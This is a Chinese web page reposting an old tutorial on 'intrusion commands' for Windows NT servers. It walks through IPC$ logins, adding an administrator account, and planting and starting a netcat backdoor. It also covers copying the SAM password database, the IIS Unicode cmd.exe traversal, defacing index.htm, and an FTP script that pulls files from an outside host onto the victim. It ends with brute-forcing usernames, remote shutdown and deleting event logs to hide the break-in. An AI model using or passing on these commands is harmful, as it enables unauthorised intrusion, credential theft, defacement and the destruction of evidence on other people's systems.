[会员中心]  [发布文章][发布软件]  [中文繁體] 
 文章·资料  电脑软件  手机软件  网站源码
   本 站 搜 索
[选项]
   推 荐 文 章       More...
华硕易电脑(ASUS Eee PC 1025C)驱动程序(Windows XP)安装参考(图) 华硕易电脑(ASUS Eee PC 1025C..
先来段开场白:为了外出携带方便..
Acronis True Image 使用说明 Acronis True Image 使用说明
  一款可以在Windows下使用..
Norton Ghost 使用详解 Norton Ghost 使用详解
一、分区备份   使用Ghost..
   阅 读 排 行
Windows 系统安装或备份时 ISO,GHO,WIM,ESD,PMF 都是什么文件类型 Windows 系统安装或备份时 ISO,GH..
【ISO 文件】 ISO 文件其实就..
使用“自动点击器”APP 在抖音直播间自动点赞 使用“自动点击器”APP 在抖音直..
看过抖音直播的朋友都知道,进入..
OPPO 手机的锁屏时间设置成横向显示 OPPO 手机的锁屏时间设置成横向..
第一次使用 OPPO 手机,桌面和锁..
电脑机箱(主板)前面板 USB 数据线的接线参考(图) 电脑机箱(主板)前面板 USB 数据..
  一、概述   因为每个 US..
抖音直播录屏的草稿保存位置 抖音直播录屏的草稿保存位置
抖音直播录屏,保存为“草稿”后,..
微信收到 flv 格式视频,如何播放? 微信收到 flv 格式视频,如何播放?
  微信上收到一个 flv 格式视频..
TrustAsia/DigiCert/Let s Encrypt 的免费 SSL 证书,多款网页浏览器都无法正常打开 TrustAsia/DigiCert/Let s Encryp..
云服务器安装了 Windows Server 2..
三星打印机(SCX-4521)提示“墨粉不足”设置 三星打印机(SCX-4521)提示“墨粉..
  三星打印机(SCX-4521)在添加..
文 章 信 息
菜鸟必练入侵命令
评论()][留言][收藏
[文章分类:电脑·手机·网络 / 网络安全·设置][阅读选项
1:NET 

只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 

这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 

net use \\127.0.0.1\ipc$ "123456" /user:"hbx" 

退出的命令是 

net use \\127.0.0.1\ipc$ /delte 

下面的操作你必须登陆后才可以用.登陆的方法就在上面. 

---------------------- 

下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户. 

我们加一个heibai的用户密码为lovechina 

net user heibai lovechina /add 

只要显示命令成功,那么我们可以把他加入Administrator组了. 

net localgroup Administrators heibai /add 

---------------------- 

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. 

net use z:\\127.0.0.1\c$ 

---------------------- 

net start telnet 

这样可以打开对方的TELNET服务. 

---------------------- 

这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。

  
net user guest /active:yes 

---------------------- 

这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀! 

net user guest lovechina 

net命令果然强大啊! 

2:at 

一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢? 

那么需要用AT命令,这里假设你已经登陆了那个服务器。 

你首先要得到对方的时间, 

net time \\127.0.0.1 

将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1 

at \\127.0.0.1 12:3 nc.exe 

这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上. 

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 

3:telnet 

这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口. 

telnet 127.0.0.1 99 

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 

4:FTP 

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个www.51.NET,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器. 

在上传前需要登陆先,这里我们假设FTP服务器是www.51.NET,用户名是HUCJS,密码是654321 

ftp http://www.51.net 

他会要求输入用户,成功后会要求输入密码.

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ 

get c:\index.htm d:\ 

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 

put c:\index.htm d:\ 

5:copy 

下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。 

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 

copy index.htm \\127.0.0.1\c$\index.htm 

---------------------- 

如果你要复制到D盘下把C改为D,就行了! 


copy index.htm \\127.0.0.1\d$\index.htm 

---------------------- 

如果你要把他复制到WINNT目录里 

就要把输入 

copy index.htm \\127.0.0.1\admin$\index.htm 

admin$是winnt 

---------------------- 

要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名 

下面就把127.0.0.1的数据库复制到本地C盘下 

copy \\127.0.0.1\admin$\repair\sam._ c:\ 

---------------------- 

6:set 

如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令! 

下面是我得到的结果!我来分析它,只是找主页在那而已。 

COMPUTERNAME=PENTIUMII 
ComSpec=D:\WINNT\system32\cmd.exe 
CONTENT_LENGTH=0 
GATEWAY_INTERFACE=CGI/1.1 
HTTP_ACCEPT=*/* 
HTTP_ACCEPT_LANGUAGE=zh-cn 
HTTP_CONNECTION=Keep-Alive 
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了 
HTTP_ACCEPT_ENCODING=gzip, deflate 
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) 
NUMBER_OF_PROCESSORS=1 
Os2LibPath=D:\WINNT\system32\os2\dll; 
OS=Windows_NT 
Path=D:\WINNT\system32;D:\WINNT 
PATHEXT=.COM;.EXE;.BAT;.CMD 
PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot 
PROCESSOR_ARCHITECTURE=x86 
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel 
PROCESSOR_LEVEL=6 
PROCESSOR_REVISION=0303 
PROMPT=$P$G 
QUERY_STRING=/c+set 
REMOTE_ADDR=XX.XX.XX.XX 
REMOTE_HOST=XX.XX.XX.XX 
REQUEST_METHOD=GET 
script_NAME=/scripts/..%2f../winnt/system32/cmd.exe 
SERVER_NAME=XX.XX.XX.XX 
SERVER_PORT=80 
SERVER_PORT_SECURE=0 
SERVER_PROTOCOL=HTTP/1.1 
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 
SystemDrive=D: 
SystemRoot=D:\WINNT 
TZ=GMT-9 
USERPROFILE=D:\WINNT\Profiles\Default User 
windir=D:\WINNT 

粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。 

  
7:nbtstat 

如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧! 

现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。 

命令是 

nbtstat -A XX.XX.XX.XX 

-A一定要大写哦。 

下面是得到的结果。 

NetBIOS Remote Machine Name Table 

Name Type Status 
--------------------------------------------- 
Registered Registered Registered Registered Registered Registered Registered Reg 
istered Registered Registered Registered 
MAC Address = 00-E0-29-14-35-BA 
PENTIUMII <00> UNIQUE 
PENTIUMII <20> UNIQUE 
ORAHOTOWN <00> GROUP 
ORAHOTOWN <1C> GROUP 
ORAHOTOWN <1B> UNIQUE 
PENTIUMII <03> UNIQUE 
INet~Services <1C> GROUP 
IS~PENTIUMII...<00> UNIQUE 
ORAHOTOWN <1E> GROUP 
ORAHOTOWN <1D> UNIQUE 
..__MSBROWSE__.<01> GROUP 


粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户。 

这里的用户是PENTIUMII。 

8:Shutdown 

关了对方的NT服务器的命令 

Shutdown \\IP地址 t:20 

20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。 

9:DIR 

这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。 

你可以本地试下。 

10:echo 

著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。 

我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。 

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm 

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm 

第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。 



第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。 

“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。 

大家可以本地试下。

可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。 

1、首先,我们需要申请一个免费的主页空间。 

2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。) 
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的) 
cnhack(你申请时的用户名) 
test(你申请时的密码) 
get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm) 
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS) 

具体的做法: 
输入 echo open upload.chinaren.com> c:\cnhack.txt 
输入 echo cnhack >> c:\cnhack.txt 
输入 echo 39abs >> c:\cnhack.txt 
输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt 
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。) 

等命令完成时,文件已经下载到你指定的文件里了。 

注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。) 

记得要 del c:\cnhack.txt 

11:attrib 

这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。 

attrib -r index.htm 

这个命令是把index.htm的只读属性去掉。 

如果把“-”改为“+”则是把这个文件的属性设置为只读 

---------------------- 

attrib +r index.htm 

这个命令是把index.htm的属性设置为只读。 

12:del 

当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。 

NT的日志有这些 

del C:\winnt\system32\logfiles\*.* 
del C:\winnt\ssytem32\config\*.evt 
del C:\winnt\system32\dtclog\*.* 
del C:\winnt\system32\*.log 
del C:\winnt\system32\*.txt 
del C:\winnt\*.txt 
del C:\winnt\*.log 

只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘.

文章作者:未知  更新日期:2006-03-12
[文章浏览:][打印文章][发送文章
阅读说明
·本站大部分文章转载于网络,如有侵权请留言告知,本站即做删除处理。
·本站法律法规类文章转载自[中国政府网(www.org.cn)],相关法律法规如有修订,请浏览[中国政府网]网站。
·本站转载的文章,不为其有效性,实效性,安全性,可用性等做保证。
·如果有什么问题,或者意见建议,请联系[网站管理员]
  原“浪人文章”和“浪人下载”网站已合并为“老若尔文章软件站”,域名:https://lre.cn
  本站使用【啊估文章软件站】网站系统    网站管理员留言簿〗〖捐助     闽ICP备08009617号